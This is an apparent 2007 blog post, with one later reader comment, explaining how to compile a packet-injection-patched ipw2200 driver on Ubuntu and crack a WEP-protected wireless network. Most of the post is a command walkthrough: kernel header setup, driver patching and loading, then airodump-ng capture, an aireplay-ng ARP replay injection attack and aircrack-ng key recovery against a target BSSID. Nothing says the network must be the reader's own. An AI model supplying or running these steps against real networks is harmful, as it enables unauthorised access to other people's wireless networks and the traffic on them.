Wednesday, September 19, 2007

WEP cracking with ipw2200

I was planning to buy ubuiqiti atheros wireless card last few months... but I don't really need that anymore. I now can cracked WEP wireless network with my build-in ipw2200 wireless card and without external wireless card.

These are the installation on my ubuntu, yours may differ but it should works in general if you have linux headers installed. In case you get an error compiling and missing file headers, you may download following packages:


apt-get install build-essential
apt-get install linux-source
apt-get install linux-headers-`uname -r`
apt-get install sharutils

make sure you have the core linux-headers available in your /usr/src/linux

mv /usr/src/linux-headers-`uname -r` /usr/src/linux_bak
ln -s /usr/src/linux-headers-`uname -r`/ /usr/src/linux
ls -l /usr/src/linux/ # Should not be empty

I downloaded the source code for ipw2200 version 1.2.1 here, ieee80211 version 1.2.17 here and ipw2200 injection patch for v1.2.1 from here.

Putted all downloaded files in the same directory and cd into that directory in a terminal unpack archives

shaolinint@slash# tar -xvf ipw2200-1.2.1-inject_patch.tar.gz
shaolinint@slash# tar -xvf ipw2200-*.tgz
shaolinint@slash# tar -xvf ieee80211-*.tgz

apply patch

shaolinint@slash# patch -p0 < ipw2200-1.2.1-inject.patch
shaolinint@slash# patch -p0 < ipw2200-1.2.1-inject_Makefile.patch

change ipw2200 Makefile from:

ifndef
CONFIG_IPW2200
EXTERNAL_BUILD=y
CONFIG_IPW2200=m
CONFIG_IPW2200_DEBUG=y
CONFIG_IPW2200_QOS=y
...
endif

to

#ifndef
CONFIG_IPW2200
EXTERNAL_BUILD=y
CONFIG_IPW2200=m
CONFIG_IPW2200_DEBUG=y
CONFIG_IPW2200_QOS=y
...
#endif


compiling ieee80211 and ipw2200:

shaolinint@slash# cd ieee80211-*
shaolinint@slash# ./remove-old
shaolinint@slash# make
# 'y' in all Questions
shaolinint@slash# make install

shaolinint@slash# cd ../ipw2200-1.2.1
shaolinint@slash# ./remove-old
# 'y' in all Questions
shaolinint@slash# make
shaolinint@slash# make install

shaolinint@slash# rmmod ipw2200
shaolinint@slash# modprobe ipw2200 rtap_iface=1

ready to go (opened different terminal on each command):

ASSUMED:
ESSID = pgxtest
BSSID = 00:11:22:33:44:55
ETH1 MAC = 00:00:11:11:22:22
FFFF-FFFF: dummy key, could be anything

shaolinint@slash# iwconfig eth1 essid pgxtest key FFFF-FFFF mode managed
shaolinint@slash# airodump-ng --channel 11 --bssid 00:11:22:33:44:55 -w airodump -i rtap0
shaolinint@slash# aireplay-ng -3 -x 1000 -b 00:11:22:33:44:55 -h 00:00:11:11:22:22 -i rtap0 eth1
shaolinint@slash# aircrack-ng airodump.ivs
Posted by at
Labels:

1 comment:

step said...

I gotten it from here

http://telefonica.net/web2/wifislax/varios/ipw2200-1.2.1-inject_patch.tar.gz

The existing has already been removed. The post was back in 2007. I'm a bit too late.

July 19, 2010 at 9:52 PM

Post a Comment

Subscribe to: Post Comments (Atom)